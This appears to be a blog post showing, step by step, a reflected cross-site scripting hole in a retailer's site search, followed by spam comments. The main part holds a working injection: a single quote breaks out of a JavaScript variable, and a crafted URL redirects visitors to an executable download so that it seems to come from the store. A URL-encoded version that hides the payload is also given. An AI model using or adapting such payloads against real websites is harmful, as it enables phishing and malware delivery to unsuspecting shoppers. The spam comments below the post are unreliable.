Without viewing the source it's apparent that our test string has been significantly altered. ,:;\'"<>()[]{} has been completely removed from our search, but how much of this happened client-side? Lets take a look at the current URL.
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testa.&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=By changing the kw field to our original search string we can create our own URL and see how reliant on client-side validation the site is. Our new URL should look like this:
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testA.,:;\'"<>()[]{}&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=
Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. Looking at the first match for testA it's apparent that our search string is encoded.
<input type="text" style="font-size:10px;width:164px;" name="kw" id="kw" value="testA.,:;\'"<>()[]{}">
This complicates things, but an attack is still possible. Lets look at some of the other results. Near the bottom of the page is the following block of javascript:
var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='testA.,:;\'"<>()[]{}';
var s_pageName='Search (internal)';
Because we have access to the single quote character, we can easily inject code here. Consider what would happen if we passed in ';var x=' as the keyword.
var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='';var x='';
var s_pageName='Search (internal)';
At this point we can write any javascript we want between the ; and v provided we don't use any of the encoded characters. As an example of what can be done with this, we can craft a URL that redirects to a download making it seem as is if it's coming from www.radioshack.com.
http://www.radioshack.com/search/noResults.jsp?kw=';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='
And again we can URL encode the payload.
http://www.radioshack.com/search/noResults.jsp?kw=%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27
A searchable online catalog of the popular electronics store, Radio Shack. Consumers can purchase everything from computers to digital photo frames or gift cards. Products are divided into ten categories, each having several subcategories.
ReplyDeletenorton promo bike shop melbourne
Secure Bytes business philosophy is to provide a single console from where organization can cater their security concerns and resolve Information Security issues proactively. We are result oriented rather than task oriented with focus on cost minimization and productivity which we attain through preserving our human assets, comprehensive and innovative solutions.
ReplyDeleteit security
increase youtube views
buy diablo 3 goldThings certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. It is useful~
ReplyDeletedécouvrir ceci meilleurs sacs de répliques en ligne cliquez ici maintenant Dolabuy Goyard leur explication jetez un œil ici
ReplyDeleteGrreat share
ReplyDelete